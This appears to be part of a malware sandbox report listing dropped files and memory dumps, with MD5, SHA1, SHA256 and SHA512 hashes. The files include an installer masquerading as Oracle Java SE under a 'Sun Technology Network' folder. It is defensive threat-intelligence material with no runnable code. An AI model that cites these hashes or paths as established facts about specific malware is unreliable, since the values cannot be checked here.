| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat
| MD5 | c41305cebcf71d9369f6af4b57c8bbca |
| SHA1 | 4a8245d040f781ed14541af314588cc7cdba793b |
| SHA256 | d2471d2070a7cbd5f1903d03fa1e33418e72129a2721a14c038810f11510a2f7 |
| SHA512 | e530516f97c5130a97dfa4e134d850ff97ad46f88789d3cb1ba91fa3fa504a27be6f284506bbd3fe1924b0f9d16ea4571fdb4fe835873668295622e1243b15f5 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qmzq2i1.j5k.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ff575baec38758fd4fc88d1b28acbfa |
| SHA1 | 29902309c070efa5dd9cc33d5c32da258670c3f4 |
| SHA256 | c824d34567ff7149502eaee52f159ccfa37ae41f434259af51ce6958e54cd988 |
| SHA512 | bd3046c02fdfd6dce0cd7ebd9ccb6e8e7ca3589c6964012f2b0574e700712cb50e2059f182b43f681177c33f83582092fda337adf3c5da41538a93c8992d4d55 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7fb62ca91e9ad74aca6fc767b900945c |
| SHA1 | 272045782426d95b66e100d0ace1c36d7d076c8d |
| SHA256 | a902d8973165b7c6fc4656d8e13a619da2feea017ba9d830400240bfdcd8f8e9 |
| SHA512 | f96d4d6a05c665e890257fb84dc61923474d31e1858da9c149d2b9a9d14053d3a42579a08e8ce80c2dfc186564649999ed7c527fa9cc446f859e90c543eb7dbb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
memory/4516-174-0x00000000054F0000-0x0000000005844000-memory.dmp
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | 2e68a858f54dda699080af452da69e39 |
| SHA1 | 32a47540728cca729da3972f180c5c70042f0aca |
| SHA256 | 8c9889fad72842cd414738b8ef1915563d29e85e6defc1b147ea8864015a1d7b |
| SHA512 | 7754cbc50dd27553ca61206cb4cbe3ca36d3299ba31ce342ac293507cd445f68acec918602b35fb727132b9dd348c97575e21742c781a04cdceb22fea467851d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4db5aa714df95aedea3dfa0aeffba86e |
| SHA1 | b9f0356863d8c92fdba288de646abf9ffcff2084 |
| SHA256 | 6299ec59bcbcf3c9bd10720e3268f1e0b9a1c6a1b88a734f61653d63a9df9c65 |
| SHA512 | 73ccd94cd62ffe7d34e03c021fac7f27fe47582dcaa36b02de3ce2624b45a66887b75a865bf1d22d645b1288f7804e4a918272603af322dc9ed8bbb9cf246cc8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6cb9420fb2ad84212412db196018d265 |
| SHA1 | f4cc72376c0d9defc2a6ceacdde12c334d297f98 |
| SHA256 | 8dd9e7fce514a3da2cc70e5e9f770d3b219e2e45a921332b9f9fcdaf42bb43bb |
| SHA512 | 42966079f426ed980ce1a40907337689226508816738d46c714c406d252e645dbb22ad27771fabdacec4b3a99c60c8ae4b3e474887b002eecc4a8350128ba783 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a373b8f003df153d15f671b9d6ed0c1f |
| SHA1 | 7812c002f0c577c63f04d8767f623641b9935eeb |
| SHA256 | 1d63eef9e0d0bacbd5859d8da5a72308920a6b4e785f1b530f26fc2426bcef07 |
| SHA512 | 14641b254ea96940cc691b8fdf62f80256a651ca4a422b43ba7ae8d680ba9d76c4b8a4c0b1f77bdfe132090b5ff60a5d17ea15fc1a08d4657304ae7978ab4bca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2a59a7ebbf06330f2a1e4fb146939c8a |
| SHA1 | 595921c3a32e1fa25a540e547712bd03c4e3b503 |
| SHA256 | f29240f7642cb1544ce9dbff87a7efc1f216e2cb6517cca7329c4c14ed148f53 |
| SHA512 | 1bdc25e1f8a3e830a99076af9f030332246c311d08476bc4b4f51be23d3088310575808d149db98ca4f75dfb8ca236bcfe67dbba46ceabdf24480541321f192e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70dc12e7ba0e5f21403b60415229231f |
| SHA1 | c3c30852aef9bef3127e9944dd333104817d63b7 |
| SHA256 | 01aa53e0f1c5b6f6b85d242427ef5386e8afa2bdb8046280ddf957e72355c39d |
| SHA512 | fcec8183747dc7bbde32e581afc054b83e7d4f44797871dfbdbcab6a5ba80e2d384283855c529a6d269624f847ff5803dc3c0f7ce1212aedf8f39fd8ee5a7b6b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d78ece7758f31d1851d458deba14430 |
| SHA1 | 14e785c4245fc139711c5723f1033a27acf5c43f |
| SHA256 | 9cfbfabea93c71d3697f277721ec0c68984717182e9ec41f470fb3b08c059a14 |
| SHA512 | 84211728968352238a459681cebdbcd2d504fc1a568bbc27cb5488923c57c1ef9bfbae18ee2e1075f409609ec6ec2754f11aab6767d440ecb225972318f51d4b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 85d9a7d326ab6e475670b8b87e46a05a |
| SHA1 | 9e99ec99a5c2af75e81ec489cb7888feb730fc48 |
| SHA256 | bfea3e8d747f2cf88087355e34431fc88a78d1cdbe14c04bf701cd9516f03a40 |
| SHA512 | 7b9598de902bd5c199e6b1bbf7e14028dff66baae2f7a3e2b23fca7b7896e1964eb0d0616a736f1bf2a0fcabc34c678e2fdc333e3f3696d838afccfabe32f01c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ada02612e67f1c40b90dc1c6843a2f9 |
| SHA1 | 223cab9cc26350d757e9c8fb1f4d0b86fad7a318 |
| SHA256 | c0ab05a51565b5460d943d4716f3a3736a8ba0355f2debc99228bbff7b187e93 |
| SHA512 | 2c4a2b70e9c212a654ebe78911357e0e089344c073e1e4dbba7c1dbb8dbcc389f7f726f07c1f1cd949ec54a4bea71910f6682185f7a226294e0e6b4df8538c3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1caf3595ce8ebc134da8216f111aeb19 |
| SHA1 | a2102e690189fa00af8b08225608eba04a61ed04 |
| SHA256 | 90a80a7379ebee20349f478bc5648531f6a82d8dd5b6a8d8d89cea09fa2805c0 |
| SHA512 | 0752be235720018a30e40b88adea8f2c8f898ed371f4554a638d1137e8360f6641928ebf3a6e4d979ea022834def43e0c31a844d9f13c0935d6698708b34ebeb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5ca3e16b506d7d705d6b433e626a5d53 |
| SHA1 | 9d990877202ba05ff36e24aa2fe359301036e7ba |
| SHA256 | c4287a99073aa0adc0a6156a51304b8f36fc5bae3cbce6d248d3d95fb8d40600 |
| SHA512 | bc74d45b8d35212bc1ff421572bc04c6433e4d261a96deb71af39303498f60588a51757e54dcafe24234de898f7b195388bf37413e1b957fde47d66d7d5171f9 |
C:\Config.Msi\e57a2e8.rbs
| MD5 | dcca9d4c5add35582b45d57be11f1492 |
| SHA1 | 7ff7cf46e46f214061cae58f6f0b5126c1964a8a |
| SHA256 | d8bf969f7c260719a5ccec87374cc918e227588216ced40f8c4b300fd8e2b847 |
| SHA512 | 96718b1440abfb41ebb794bce7dbe6b18bc84e6adeb414284d8451d45339f4e2da4c3b1a36bf9d41ea737d4024111b399688c45df208204ec2cda8b86b28dc6e |
C:\Windows\Installer\e57a2e7.msi
| MD5 | 1d2fdd9c09c8452e9c88222f2c16806a |
| SHA1 | 5852958feca13943a937f638a0ea6cfb59307574 |
| SHA256 | 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5 |
| SHA512 | 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1 |
memory/3000-520-0x00007FFA80910000-0x00007FFA80D90000-memory.dmp